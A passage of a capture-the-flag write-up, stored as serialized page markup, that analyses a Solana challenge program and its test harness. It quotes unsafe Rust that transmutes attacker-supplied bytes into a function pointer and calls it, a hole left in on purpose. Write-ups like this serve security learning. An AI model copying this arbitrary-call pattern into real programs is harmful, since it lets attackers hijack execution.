ptr",{"type":25,"tag":216,"props":44849,"children":44850},{"style":6953},[44851],{"type":31,"value":179},{"type":25,"tag":216,"props":44853,"children":44854},{"style":7047},[44855],{"type":31,"value":44856},"write_volatile",{"type":25,"tag":216,"props":44858,"children":44859},{"style":6964},[44860],{"type":31,"value":1850},{"type":25,"tag":216,"props":44862,"children":44863},{"style":6947},[44864],{"type":31,"value":16588},{"type":25,"tag":216,"props":44866,"children":44867},{"style":6964},[44868],{"type":31,"value":7797},{"type":25,"tag":216,"props":44870,"children":44871},{"class":6922,"line":7244},[44872],{"type":25,"tag":216,"props":44873,"children":44874},{"style":6964},[44875],{"type":31,"value":7311},{"type":25,"tag":216,"props":44877,"children":44878},{"class":6922,"line":7257},[44879],{"type":25,"tag":216,"props":44880,"children":44881},{"style":6964},[44882],{"type":31,"value":7874},{"type":25,"tag":6711,"props":44884,"children":44885},{"start":6769},[44886],{"type":25,"tag":2043,"props":44887,"children":44888},{},[44889,44890,44896],{"type":31,"value":11431},{"type":25,"tag":82,"props":44891,"children":44893},{"className":44892},[],[44894],{"type":31,"value":44895},"data[0] == 1",{"type":31,"value":44897},", a CPI to a non-existent program is executed:",{"type":25,"tag":206,"props":44899,"children":44901},{"className":6915,"code":44900,"language":6914,"meta":7,"style":7},"#[inline(never)]\npub fn call(data: &[u8]) {\n    let ix = Instruction {\n        program_id: pubkey!(\"osecio5555555555555551111111111111111111111\"),\n        data: data.try_into().unwrap(),\n        accounts: vec![]\n    };\n\n    invoke_signed_unchecked(\n        &ix,\n        &[],\n        &[],\n    ).unwrap();\n}\n",[44902],{"type":25,"tag":82,"props":44903,"children":44904},{"__ignoreMap":7},[44905,44912,44956,44981,45011,45051,45072,45079,45086,45098,45114,45126,45137,45156],{"type":25,"tag":216,"props":44906,"children":44907},{"class":6922,"line":6923},[44908],{"type":25,"tag":216,"props":44909,"children":44910},{"style":6964},[44911],{"type":31,"value":44543},{"type":25,"tag":216,"props":44913,"children":44914},{"class":6922,"line":6769},[44915,44919,44923,44928,44932,44936,44940,44944,44948,44952],{"type":25,"tag":216,"props":44916,"children":44917},{"style":6936},[44918],{"type":31,"value":17647},{"type":25,"tag":216,"props":44920,"children":44921},{"style":6936},[44922],{"type":31,"value":17652},{"type":25,"tag":216,"props":44924,"children":44925},{"style":7047},[44926],{"type":31,"value":44927}," call",{"type":25,"tag":216,"props":44929,"children":44930},{"style":6964},[44931],{"type":31,"value":1850},{"type":25,"tag":216,"props":44933,"children":44934},{"style":6947},[44935],{"type":31,"value":7669},{"type":25,"tag":216,"props":44937,"children":44938},{"style":6953},[44939],{"type":31,"value":1472},{"type":25,"tag":216,"props":44941,"children":44942},{"style":6953},[44943],{"type":31,"value":11093},{"type":25,"tag":216,"props":44945,"children":44946},{"style":6964},[44947],{"type":31,"value":7701},{"type":25,"tag":216,"props":44949,"children":44950},{"style":7375},[44951],{"type":31,"value":7378},{"type":25,"tag":216,"props":44953,"children":44954},{"style":6964},[44955],{"type":31,"value":44588},{"type":25,"tag":216,"props":44957,"children":44958},{"class":6922,"line":6778},[44959,44963,44968,44972,44977],{"type":25,"tag":216,"props":44960,"children":44961},{"style":6936},[44962],{"type":31,"value":6939},{"type":25,"tag":216,"props":44964,"children":44965},{"style":6947},[44966],{"type":31,"value":44967}," ix",{"type":25,"tag":216,"props":44969,"children":44970},{"style":6953},[44971],{"type":31,"value":6956},{"type":25,"tag":216,"props":44973,"children":44974},{"style":7375},[44975],{"type":31,"value":44976}," Instruction",{"type":25,"tag":216,"props":44978,"children":44979},{"style":6964},[44980],{"type":31,"value":7241},{"type":25,"tag":216,"props":44982,"children":44983},{"class":6922,"line":7005},[44984,44989,44993,44998,45002,45007],{"type":25,"tag":216,"props":44985,"children":44986},{"style":6947},[44987],{"type":31,"value":44988},"        program_id",{"type":25,"tag":216,"props":44990,"children":44991},{"style":6953},[44992],{"type":31,"value":1472},{"type":25,"tag":216,"props":44994,"children":44995},{"style":7047},[44996],{"type":31,"value":44997}," pubkey!",{"type":25,"tag":216,"props":44999,"children":45000},{"style":6964},[45001],{"type":31,"value":1850},{"type":25,"tag":216,"props":45003,"children":45004},{"style":8205},[45005],{"type":31,"value":45006},"\"osecio5555555555555551111111111111111111111\"",{"type":25,"tag":216,"props":45008,"children":45009},{"style":6964},[45010],{"type":31,"value":10688},{"type":25,"tag":216,"props":45012,"children":45013},{"class":6922,"line":7110},[45014,45019,45023,45027,45031,45035,45039,45043,45047],{"type":25,"tag":216,"props":45015,"children":45016},{"style":6947},[45017],{"type":31,"value":45018},"        data",{"type":25,"tag":216,"props":45020,"children":45021},{"style":6953},[45022],{"type":31,"value":1472},{"type":25,"tag":216,"props":45024,"children":45025},{"style":6947},[45026],{"type":31,"value":19062},{"type":25,"tag":216,"props":45028,"children":45029},{"style":6953},[45030],{"type":31,"value":179},{"type":25,"tag":216,"props":45032,"children":45033},{"style":7047},[45034],{"type":31,"value":30120},{"type":25,"tag":216,"props":45036,"children":45037},{"style":6964},[45038],{"type":31,"value":17836},{"type":25,"tag":216,"props":45040,"children":45041},{"style":6953},[45042],{"type":31,"value":179},{"type":25,"tag":216,"props":45044,"children":45045},{"style":7047},[45046],{"type":31,"value":7628},{"type":25,"tag":216,"props":45048,"children":45049},{"style":6964},[45050],{"type":31,"value":7448},{"type":25,"tag":216,"props":45052,"children":45053},{"class":6922,"line":7216},[45054,45059,45063,45067],{"type":25,"tag":216,"props":45055,"children":45056},{"style":6947},[45057],{"type":31,"value":45058},"        accounts",{"type":25,"tag":216,"props":45060,"children":45061},{"style":6953},[45062],{"type":31,"value":1472},{"type":25,"tag":216,"props":45064,"children":45065},{"style":7047},[45066],{"type":31,"value":7696},{"type":25,"tag":216,"props":45068,"children":45069},{"style":6964},[45070],{"type":31,"value":45071},"[]\n",{"type":25,"tag":216,"props":45073,"children":45074},{"class":6922,"line":7244},[45075],{"type":25,"tag":216,"props":45076,"children":45077},{"style":6964},[45078],{"type":31,"value":42960},{"type":25,"tag":216,"props":45080,"children":45081},{"class":6922,"line":7257},[45082],{"type":25,"tag":216,"props":45083,"children":45084},{"emptyLinePlaceholder":16},[45085],{"type":31,"value":7642},{"type":25,"tag":216,"props":45087,"children":45088},{"class":6922,"line":7275},[45089,45094],{"type":25,"tag":216,"props":45090,"children":45091},{"style":7047},[45092],{"type":31,"value":45093},"    invoke_signed_unchecked",{"type":25,"tag":216,"props":45095,"children":45096},{"style":6964},[45097],{"type":31,"value":7420},{"type":25,"tag":216,"props":45099,"children":45100},{"class":6922,"line":7296},[45101,45105,45110],{"type":25,"tag":216,"props":45102,"children":45103},{"style":6953},[45104],{"type":31,"value":7428},{"type":25,"tag":216,"props":45106,"children":45107},{"style":6947},[45108],{"type":31,"value":45109},"ix",{"type":25,"tag":216,"props":45111,"children":45112},{"style":6964},[45113],{"type":31,"value":7465},{"type":25,"tag":216,"props":45115,"children":45116},{"class":6922,"line":7305},[45117,45121],{"type":25,"tag":216,"props":45118,"children":45119},{"style":6953},[45120],{"type":31,"value":7428},{"type":25,"tag":216,"props":45122,"children":45123},{"style":6964},[45124],{"type":31,"value":45125},"[],\n",{"type":25,"tag":216,"props":45127,"children":45128},{"class":6922,"line":7557},[45129,45133],{"type":25,"tag":216,"props":45130,"children":45131},{"style":6953},[45132],{"type":31,"value":7428},{"type":25,"tag":216,"props":45134,"children":45135},{"style":6964},[45136],{"type":31,"value":45125},{"type":25,"tag":216,"props":45138,"children":45139},{"class":6922,"line":7574},[45140,45144,45148,45152],{"type":25,"tag":216,"props":45141,"children":45142},{"style":6964},[45143],{"type":31,"value":7619},{"type":25,"tag":216,"props":45145,"children":45146},{"style":6953},[45147],{"type":31,"value":179},{"type":25,"tag":216,"props":45149,"children":45150},{"style":7047},[45151],{"type":31,"value":7628},{"type":25,"tag":216,"props":45153,"children":45154},{"style":6964},[45155],{"type":31,"value":7633},{"type":25,"tag":216,"props":45157,"children":45158},{"class":6922,"line":7591},[45159],{"type":25,"tag":216,"props":45160,"children":45161},{"style":6964},[45162],{"type":31,"value":7874},{"type":25,"tag":6711,"props":45164,"children":45165},{"start":6778},[45166],{"type":25,"tag":2043,"props":45167,"children":45168},{},[45169,45171,45177],{"type":31,"value":45170},"Finally, if ",{"type":25,"tag":82,"props":45172,"children":45174},{"className":45173},[],[45175],{"type":31,"value":45176},"data[0]",{"type":31,"value":45178}," is neither 0 nor 1, a function that lets you jump to an arbitrary address, passing an arbitrary value as the first parameter is executed:",{"type":25,"tag":206,"props":45180,"children":45182},{"className":6915,"code":45181,"language":6914,"meta":7,"style":7},"#[inline(never)]\npub fn process(mut data: &[u8]) {\n    unsafe {\n        let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr(val);\n\n        data = &data[16..];\n\n        let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr(val);\n    }\n}\n",[45183],{"type":25,"tag":82,"props":45184,"children":45185},{"__ignoreMap":7},[45186,45193,45241,45252,45372,45487,45506,45513,45548,45555,45674,45789,45808,45815],{"type":25,"tag":216,"props":45187,"children":45188},{"class":6922,"line":6923},[45189],{"type":25,"tag":216,"props":45190,"children":45191},{"style":6964},[45192],{"type":31,"value":44543},{"type":25,"tag":216,"props":45194,"children":45195},{"class":6922,"line":6769},[45196,45200,45204,45209,45213,45217,45221,45225,45229,45233,45237],{"type":25,"tag":216,"props":45197,"children":45198},{"style":6936},[45199],{"type":31,"value":17647},{"type":25,"tag":216,"props":45201,"children":45202},{"style":6936},[45203],{"type":31,"value":17652},{"type":25,"tag":216,"props":45205,"children":45206},{"style":7047},[45207],{"type":31,"value":45208}," process",{"type":25,"tag":216,"props":45210,"children":45211},{"style":6964},[45212],{"type":31,"value":1850},{"type":25,"tag":216,"props":45214,"children":45215},{"style":6936},[45216],{"type":31,"value":7691},{"type":25,"tag":216,"props":45218,"children":45219},{"style":6947},[45220],{"type":31,"value":19062},{"type":25,"tag":216,"props":45222,"children":45223},{"style":6953},[45224],{"type":31,"value":1472},{"type":25,"tag":216,"props":45226,"children":45227},{"style":6953},[45228],{"type":31,"value":11093},{"type":25,"tag":216,"props":45230,"children":45231},{"style":6964},[45232],{"type":31,"value":7701},{"type":25,"tag":216,"props":45234,"children":45235},{"style":7375},[45236],{"type":31,"value":7378},{"type":25,"tag":216,"props":45238,"children":45239},{"style":6964},[45240],{"type":31,"value":44588},{"type":25,"tag":216,"props":45242,"children":45243},{"class":6922,"line":6778},[45244,45248],{"type":25,"tag":216,"props":45245,"children":45246},{"style":6936},[45247],{"type":31,"value":17790},{"type":25,"tag":216,"props":45249,"children":45250},{"style":6964},[45251],{"type":31,"value":7241},{"type":25,"tag":216,"props":45253,"children":45254},{"class":6922,"line":7005},[45255,45259,45263,45267,45271,45275,45279,45283,45287,45291,45295,45299,45303,45307,45311,45315,45319,45323,45328,45332,45336,45340,45344,45348,45352,45356,45360,45364,45368],{"type":25,"tag":216,"props":45256,"children":45257},{"style":6936},[45258],{"type":31,"value":7011},{"type":25,"tag":216,"props":45260,"children":45261},{"style":6947},[45262],{"type":31,"value":17814},{"type":25,"tag":216,"props":45264,"children":45265},{"style":6953},[45266],{"type":31,"value":6956},{"type":25,"tag":216,"props":45268,"children":45269},{"style":6964},[45270],{"type":31,"value":44619},{"type":25,"tag":216,"props":45272,"children":45273},{"style":6953},[45274],{"type":31,"value":7438},{"type":25,"tag":216,"props":45276,"children":45277},{"style":6964},[45278],{"type":31,"value":44628},{"type":25,"tag":216,"props":45280,"children":45281},{"style":6953},[45282],{"type":31,"value":7438},{"type":25,"tag":216,"props":45284,"children":45285},{"style":7047},[45286],{"type":31,"value":44637},{"type":25,"tag":216,"props":45288,"children":45289},{"style":6953},[45290],{"type":31,"value":7438},{"type":25,"tag":216,"props":45292,"children":45293},{"style":6964},[45294],{"type":31,"value":44646},{"type":25,"tag":216,"props":45296,"children":45297},{"style":7375},[45298],{"type":31,"value":7378},{"type":25,"tag":216,"props":45300,"children":45301},{"style":6964},[45302],{"type":31,"value":21184},{"type":25,"tag":216,"props":45304,"children":45305},{"style":6989},[45306],{"type":31,"value":8031},{"type":25,"tag":216,"props":45308,"children":45309},{"style":6964},[45310],{"type":31,"value":27006},{"type":25,"tag":216,"props":45312,"children":45313},{"style":6936},[45314],{"type":31,"value":24226},{"type":25,"tag":216,"props":45316,"children":45317},{"style":6964},[45318],{"type":31,"value":1850},{"type":25,"tag":216,"props":45320,"children":45321},{"style":7375},[45322],{"type":31,"value":11994},{"type":25,"tag":216,"props":45324,"children":45325},{"style":6964},[45326],{"type":31,"value":45327},")>(",{"type":25,"tag":216,"props":45329,"children":45330},{"style":6947},[45331],{"type":31,"value":7669},{"type":25,"tag":216,"props":45333,"children":45334},{"style":6964},[45335],{"type":31,"value":7701},{"type":25,"tag":216,"props":45337,"children":45338},{"style":6953},[45339],{"type":31,"value":6997},{"type":25,"tag":216,"props":45341,"children":45342},{"style":6989},[45343],{"type":31,"value":8031},{"type":25,"tag":216,"props":45345,"children":45346},{"style":6964},[45347],{"type":31,"value":19368},{"type":25,"tag":216,"props":45349,"children":45350},{"style":6953},[45351],{"type":31,"value":179},{"type":25,"tag":216,"props":45353,"children":45354},{"style":7047},[45355],{"type":31,"value":30120},{"type":25,"tag":216,"props":45357,"children":45358},{"style":6964},[45359],{"type":31,"value":17836},{"type":25,"tag":216,"props":45361,"children":45362},{"style":6953},[45363],{"type":31,"value":179},{"type":25,"tag":216,"props":45365,"children":45366},{"style":7047},[45367],{"type":31,"value":7628},{"type":25,"tag":216,"props":45369,"children":45370},{"style":6964},[45371],{"type":31,"value":19382},{"type":25,"tag":216,"props":45373,"children":45374},{"class":6922,"line":7110},[45375,45379,45383,45387,45391,45395,45399,45403,45407,45411,45415,45419,45423,45427,45431,45435,45439,45443,45447,45451,45455,45459,45463,45467,45471,45475,45479,45483],{"type":25,"tag":216,"props":45376,"children":45377},{"style":6936},[45378],{"type":31,"value":7011},{"type":25,"tag":216,"props":45380,"children":45381},{"style":6947},[45382],{"type":31,"value":44734},{"type":25,"tag":216,"props":45384,"children":45385},{"style":6953},[45386],{"type":31,"value":6956},{"type":25,"tag":216,"props":45388,"children":45389},{"style":6964},[45390],{"type":31,"value":44619},{"type":25,"tag":216,"props":45392,"children":45393},{"style":6953},[45394],{"type":31,"value":7438},{"type":25,"tag":216,"props":45396,"children":45397},{"style":6964},[45398],{"type":31,"value":44628},{"type":25,"tag":216,"props":45400,"children":45401},{"style":6953},[45402],{"type":31,"value":7438},{"type":25,"tag":216,"props":45404,"children":45405},{"style":7047},[45406],{"type":31,"value":44637},{"type":25,"tag":216,"props":45408,"children":45409},{"style":6953},[45410],{"type":31,"value":7438},{"type":25,"tag":216,"props":45412,"children":45413},{"style":6964},[45414],{"type":31,"value":44646},{"type":25,"tag":216,"props":45416,"children":45417},{"style":7375},[45418],{"type":31,"value":7378},{"type":25,"tag":216,"props":45420,"children":45421},{"style":6964},[45422],{"type":31,"value":21184},{"type":25,"tag":216,"props":45424,"children":45425},{"style":6989},[45426],{"type":31,"value":8031},{"type":25,"tag":216,"props":45428,"children":45429},{"style":6964},[45430],{"type":31,"value":27006},{"type":25,"tag":216,"props":45432,"children":45433},{"style":7375},[45434],{"type":31,"value":11994},{"type":25,"tag":216,"props":45436,"children":45437},{"style":6964},[45438],{"type":31,"value":11562},{"type":25,"tag":216,"props":45440,"children":45441},{"style":6947},[45442],{"type":31,"value":7669},{"type":25,"tag":216,"props":45444,"children":45445},{"style":6964},[45446],{"type":31,"value":7701},{"type":25,"tag":216,"props":45448,"children":45449},{"style":6989},[45450],{"type":31,"value":8031},{"type":25,"tag":216,"props":45452,"children":45453},{"style":6953},[45454],{"type":31,"value":6997},{"type":25,"tag":216,"props":45456,"children":45457},{"style":6989},[45458],{"type":31,"value":44811},{"type":25,"tag":216,"props":45460,"children":45461},{"style":6964},[45462],{"type":31,"value":19368},{"type":25,"tag":216,"props":45464,"children":45465},{"style":6953},[45466],{"type":31,"value":179},{"type":25,"tag":216,"props":45468,"children":45469},{"style":7047},[45470],{"type":31,"value":30120},{"type":25,"tag":216,"props":45472,"children":45473},{"style":6964},[45474],{"type":31,"value":17836},{"type":25,"tag":216,"props":45476,"children":45477},{"style":6953},[45478],{"type":31,"value":179},{"type":25,"tag":216,"props":45480,"children":45481},{"style":7047},[45482],{"type":31,"value":7628},{"type":25,"tag":216,"props":45484,"children":45485},{"style":6964},[45486],{"type":31,"value":19382},{"type":25,"tag":216,"props":45488,"children":45489},{"class":6922,"line":7216},[45490,45494,45498,45502],{"type":25,"tag":216,"props":45491,"children":45492},{"style":7047},[45493],{"type":31,"value":44847},{"type":25,"tag":216,"props":45495,"children":45496},{"style":6964},[45497],{"type":31,"value":1850},{"type":25,"tag":216,"props":45499,"children":45500},{"style":6947},[45501],{"type":31,"value":16588},{"type":25,"tag":216,"props":45503,"children":45504},{"style":6964},[45505],{"type":31,"value":7797},{"type":25,"tag":216,"props":45507,"children":45508},{"class":6922,"line":7244},[45509],{"type":25,"tag":216,"props":45510,"children":45511},{"emptyLinePlaceholder":16},[45512],{"type":31,"value":7642},{"type":25,"tag":216,"props":45514,"children":45515},{"class":6922,"line":7257},[45516,45520,45524,45528,45532,45536,45540,45544],{"type":25,"tag":216,"props":45517,"children":45518},{"style":6947},[45519],{"type":31,"value":45018},{"type":25,"tag":216,"props":45521,"children":45522},{"style":6953},[45523],{"type":31,"value":6956},{"type":25,"tag":216,"props":45525,"children":45526},{"style":6953},[45527],{"type":31,"value":11093},{"type":25,"tag":216,"props":45529,"children":45530},{"style":6947},[45531],{"type":31,"value":7669},{"type":25,"tag":216,"props":45533,"children":45534},{"style":6964},[45535],{"type":31,"value":7701},{"type":25,"tag":216,"props":45537,"children":45538},{"style":6989},[45539],{"type":31,"value":44811},{"type":25,"tag":216,"props":45541,"children":45542},{"style":6953},[45543],{"type":31,"value":6997},{"type":25,"tag":216,"props":45545,"children":45546},{"style":6964},[45547],{"type":31,"value":35536},{"type":25,"tag":216,"props":45549,"children":45550},{"class":6922,"line":7275},[45551],{"type":25,"tag":216,"props":45552,"children":45553},{"emptyLinePlaceholder":16},[45554],{"type":31,"value":7642},{"type":25,"tag":216,"props":45556,"children":45557},{"class":6922,"line":7296},[45558,45562,45566,45570,45574,45578,45582,45586,45590,45594,45598,45602,45606,45610,45614,45618,45622,45626,45630,45634,45638,45642,45646,45650,45654,45658,45662,45666,45670],{"type":25,"tag":216,"props":45559,"children":45560},{"style":6936},[45561],{"type":31,"value":7011},{"type":25,"tag":216,"props":45563,"children":45564},{"style":6947},[45565],{"type":31,"value":17814},{"type":25,"tag":216,"props":45567,"children":45568},{"style":6953},[45569],{"type":31,"value":6956},{"type":25,"tag":216,"props":45571,"children":45572},{"style":6964},[45573],{"type":31,"value":44619},{"type":25,"tag":216,"props":45575,"children":45576},{"style":6953},[45577],{"type":31,"value":7438},{"type":25,"tag":216,"props":45579,"children":45580},{"style":6964},[45581],{"type":31,"value":44628},{"type":25,"tag":216,"props":45583,"children":45584},{"style":6953},[45585],{"type":31,"value":7438},{"type":25,"tag":216,"props":45587,"children":45588},{"style":7047},[45589],{"type":31,"value":44637},{"type":25,"tag":216,"props":45591,"children":45592},{"style":6953},[45593],{"type":31,"value":7438},{"type":25,"tag":216,"props":45595,"children":45596},{"style":6964},[45597],{"type":31,"value":44646},{"type":25,"tag":216,"props":45599,"children":45600},{"style":7375},[45601],{"type":31,"value":7378},{"type":25,"tag":216,"props":45603,"children":45604},{"style":6964},[45605],{"type":31,"value":21184},{"type":25,"tag":216,"props":45607,"children":45608},{"style":6989},[45609],{"type":31,"value":8031},{"type":25,"tag":216,"props":45611,"children":45612},{"style":6964},[45613],{"type":31,"value":27006},{"type":25,"tag":216,"props":45615,"children":45616},{"style":6936},[45617],{"type":31,"value":24226},{"type":25,"tag":216,"props":45619,"children":45620},{"style":6964},[45621],{"type":31,"value":1850},{"type":25,"tag":216,"props":45623,"children":45624},{"style":7375},[45625],{"type":31,"value":11994},{"type":25,"tag":216,"props":45627,"children":45628},{"style":6964},[45629],{"type":31,"value":45327},{"type":25,"tag":216,"props":45631,"children":45632},{"style":6947},[45633],{"type":31,"value":7669},{"type":25,"tag":216,"props":45635,"children":45636},{"style":6964},[45637],{"type":31,"value":7701},{"type":25,"tag":216,"props":45639,"children":45640},{"style":6953},[45641],{"type":31,"value":6997},{"type":25,"tag":216,"props":45643,"children":45644},{"style":6989},[45645],{"type":31,"value":8031},{"type":25,"tag":216,"props":45647,"children":45648},{"style":6964},[45649],{"type":31,"value":19368},{"type":25,"tag":216,"props":45651,"children":45652},{"style":6953},[45653],{"type":31,"value":179},{"type":25,"tag":216,"props":45655,"children":45656},{"style":7047},[45657],{"type":31,"value":30120},{"type":25,"tag":216,"props":45659,"children":45660},{"style":6964},[45661],{"type":31,"value":17836},{"type":25,"tag":216,"props":45663,"children":45664},{"style":6953},[45665],{"type":31,"value":179},{"type":25,"tag":216,"props":45667,"children":45668},{"style":7047},[45669],{"type":31,"value":7628},{"type":25,"tag":216,"props":45671,"children":45672},{"style":6964},[45673],{"type":31,"value":19382},{"type":25,"tag":216,"props":45675,"children":45676},{"class":6922,"line":7305},[45677,45681,45685,45689,45693,45697,45701,45705,45709,45713,45717,45721,45725,45729,45733,45737,45741,45745,45749,45753,45757,45761,45765,45769,45773,45777,45781,45785],{"type":25,"tag":216,"props":45678,"children":45679},{"style":6936},[45680],{"type":31,"value":7011},{"type":25,"tag":216,"props":45682,"children":45683},{"style":6947},[45684],{"type":31,"value":44734},{"type":25,"tag":216,"props":45686,"children":45687},{"style":6953},[45688],{"type":31,"value":6956},{"type":25,"tag":216,"props":45690,"children":45691},{"style":6964},[45692],{"type":31,"value":44619},{"type":25,"tag":216,"props":45694,"children":45695},{"style":6953},[45696],{"type":31,"value":7438},{"type":25,"tag":216,"props":45698,"children":45699},{"style":6964},[45700],{"type":31,"value":44628},{"type":25,"tag":216,"props":45702,"children":45703},{"style":6953},[45704],{"type":31,"value":7438},{"type":25,"tag":216,"props":45706,"children":45707},{"style":7047},[45708],{"type":31,"value":44637},{"type":25,"tag":216,"props":45710,"children":45711},{"style":6953},[45712],{"type":31,"value":7438},{"type":25,"tag":216,"props":45714,"children":45715},{"style":6964},[45716],{"type":31,"value":44646},{"type":25,"tag":216,"props":45718,"children":45719},{"style":7375},[45720],{"type":31,"value":7378},{"type":25,"tag":216,"props":45722,"children":45723},{"style":6964},[45724],{"type":31,"value":21184},{"type":25,"tag":216,"props":45726,"children":45727},{"style":6989},[45728],{"type":31,"value":8031},{"type":25,"tag":216,"props":45730,"children":45731},{"style":6964},[45732],{"type":31,"value":27006},{"type":25,"tag":216,"props":45734,"children":45735},{"style":7375},[45736],{"type":31,"value":11994},{"type":25,"tag":216,"props":45738,"children":45739},{"style":6964},[45740],{"type":31,"value":11562},{"type":25,"tag":216,"props":45742,"children":45743},{"style":6947},[45744],{"type":31,"value":7669},{"type":25,"tag":216,"props":45746,"children":45747},{"style":6964},[45748],{"type":31,"value":7701},{"type":25,"tag":216,"props":45750,"children":45751},{"style":6989},[45752],{"type":31,"value":8031},{"type":25,"tag":216,"props":45754,"children":45755},{"style":6953},[45756],{"type":31,"value":6997},{"type":25,"tag":216,"props":45758,"children":45759},{"style":6989},[45760],{"type":31,"value":44811},{"type":25,"tag":216,"props":45762,"children":45763},{"style":6964},[45764],{"type":31,"value":19368},{"type":25,"tag":216,"props":45766,"children":45767},{"style":6953},[45768],{"type":31,"value":179},{"type":25,"tag":216,"props":45770,"children":45771},{"style":7047},[45772],{"type":31,"value":30120},{"type":25,"tag":216,"props":45774,"children":45775},{"style":6964},[45776],{"type":31,"value":17836},{"type":25,"tag":216,"props":45778,"children":45779},{"style":6953},[45780],{"type":31,"value":179},{"type":25,"tag":216,"props":45782,"children":45783},{"style":7047},[45784],{"type":31,"value":7628},{"type":25,"tag":216,"props":45786,"children":45787},{"style":6964},[45788],{"type":31,"value":19382},{"type":25,"tag":216,"props":45790,"children":45791},{"class":6922,"line":7557},[45792,45796,45800,45804],{"type":25,"tag":216,"props":45793,"children":45794},{"style":7047},[45795],{"type":31,"value":44847},{"type":25,"tag":216,"props":45797,"children":45798},{"style":6964},[45799],{"type":31,"value":1850},{"type":25,"tag":216,"props":45801,"children":45802},{"style":6947},[45803],{"type":31,"value":16588},{"type":25,"tag":216,"props":45805,"children":45806},{"style":6964},[45807],{"type":31,"value":7797},{"type":25,"tag":216,"props":45809,"children":45810},{"class":6922,"line":7574},[45811],{"type":25,"tag":216,"props":45812,"children":45813},{"style":6964},[45814],{"type":31,"value":7311},{"type":25,"tag":216,"props":45816,"children":45817},{"class":6922,"line":7591},[45818],{"type":25,"tag":216,"props":45819,"children":45820},{"style":6964},[45821],{"type":31,"value":7874},{"type":25,"tag":606,"props":45823,"children":45825},{"id":45824},"test-environment",[45826],{"type":31,"value":45827},"Test Environment",{"type":25,"tag":38,"props":45829,"children":45830},{},[45831],{"type":31,"value":45832},"To understand our capabilites regarding interaction with the program and determine what is necessary to get the flag, we must analyze the test environment.",{"type":25,"tag":38,"props":45834,"children":45835},{},[45836,45838,45844],{"type":31,"value":45837},"When you connect to the server through a tcp connection, ",{"type":25,"tag":82,"props":45839,"children":45841},{"className":45840},[],[45842],{"type":31,"value":45843},"framework/src/main.rs::handle_connection",{"type":31,"value":45845}," gets executed, which does the following:",{"type":25,"tag":6711,"props":45847,"children":45848},{},[45849],{"type":25,"tag":2043,"props":45850,"children":45851},{},[45852],{"type":31,"value":45853},"Creates a new Solana local node",{"type":25,"tag":206,"props":45855,"children":45857},{"className":6915,"code":45856,"language":6914,"meta":7,"style":7},"let mut builder = ChallengeBuilder::try_from(socket.try_clone().unwrap()).unwrap();\nassert!(builder.add_program(\"/path/to/chall.so\", Some(chall::ID)) == chall::ID);\nlet mut chall = builder.build().await;\n",[45858],{"type":25,"tag":82,"props":45859,"children":45860},{"__ignoreMap":7},[45861,45942,46018],{"type":25,"tag":216,"props":45862,"children":45863},{"class":6922,"line":6923},[45864,45868,45872,45877,45881,45886,45890,45895,45899,45904,45908,45913,45917,45921,45925,45930,45934,45938],{"type":25,"tag":216,"props":45865,"children":45866},{"style":6936},[45867],{"type":31,"value":15743},{"type":25,"tag":216,"props":45869,"children":45870},{"style":6936},[45871],{"type":31,"value":6944},{"type":25,"tag":216,"props":45873,"children":45874},{"style":6947},[45875],{"type":31,"value":45876}," builder",{"type":25,"tag":216,"props":45878,"children":45879},{"style":6953},[45880],{"type":31,"value":6956},{"type":25,"tag":216,"props":45882,"children":45883},{"style":7375},[45884],{"type":31,"value":45885}," ChallengeBuilder",{"type":25,"tag":216,"props":45887,"children":45888},{"style":6953},[45889],{"type":31,"value":7438},{"type":25,"tag":216,"props":45891,"children":45892},{"style":7047},[45893],{"type":31,"value":45894},"try_from",{"type":25,"tag":216,"props":45896,"children":45897},{"style":6964},[45898],{"type":31,"value":1850},{"type":25,"tag":216,"props":45900,"children":45901},{"style":6947},[45902],{"type":31,"value":45903},"socket",{"type":25,"tag":216,"props":45905,"children":45906},{"style":6953},[45907],{"type":31,"value":179},{"type":25,"tag":216,"props":45909,"children":45910},{"style":7047},[45911],{"type":31,"value":45912},"try_clone",{"type":25,"tag":216,"props":45914,"children":45915},{"style":6964},[45916],{"type":31,"value":17836},{"type":25,"tag":216,"props":45918,"children":45919},{"style":6953},[45920],{"type":31,"value":179},{"type":25,"tag":216,"props":45922,"children":45923},{"style":7047},[45924],{"type":31,"value":7628},{"type":25,"tag":216,"props":45926,"children":45927},{"style":6964},[45928],{"type":31,"value":45929},"())",{"type":25,"tag":216,"props":45931,"children":45932},{"style":6953},[45933],{"type":31,"value":179},{"type":25,"tag":216,"props":45935,"children":45936},{"style":7047},[45937],{"type":31,"value":7628},{"type":25,"tag":216,"props":45939,"children":45940},{"style":6964},[45941],{"type":31,"value":7633},{"type":25,"tag":216,"props":45943,"children":45944},{"class":6922,"line":6769},[45945,45950,45954,45959,45963,45968,45972,45977,45981,45986,45991,45995,46000,46004,46009,46013],{"type":25,"tag":216,"props":45946,"children":45947},{"style":7047},[45948],{"type":31,"value":45949},"assert!",{"type":25,"tag":216,"props":45951,"children":45952},{"style":6964},[45953],{"type":31,"value":1850},{"type":25,"tag":216,"props":45955,"children":45956},{"style":6947},[45957],{"type":31,"value":45958},"builder",{"type":25,"tag":216,"props":45960,"children":45961},{"style":6953},[45962],{"type":31,"value":179},{"type":25,"tag":216,"props":45964,"children":45965},{"style":7047},[45966],{"type":31,"value":45967},"add_program",{"type":25,"tag":216,"props":45969,"children":45970},{"style":6964},[45971],{"type":31,"value":1850},{"type":25,"tag":216,"props":45973,"children":45974},{"style":8205},[45975],{"type":31,"value":45976},"\"/path/to/chall.so\"",{"type":25,"tag":216,"props":45978,"children":45979},{"style":6964},[45980],{"type":31,"value":7026},{"type":25,"tag":216,"props":45982,"children":45983},{"style":7375},[45984],{"type":31,"value":45985},"Some",{"type":25,"tag":216,"props":45987,"children":45988},{"style":6964},[45989],{"type":31,"value":45990},"(chall",{"type":25,"tag":216,"props":45992,"children":45993},{"style":6953},[45994],{"type":31,"value":7438},{"type":25,"tag":216,"props":45996,"children":45997},{"style":6964},[45998],{"type":31,"value":45999},"ID)) ",{"type":25,"tag":216,"props":46001,"children":46002},{"style":6953},[46003],{"type":31,"value":12528},{"type":25,"tag":216,"props":46005,"children":46006},{"style":6964},[46007],{"type":31,"value":46008}," 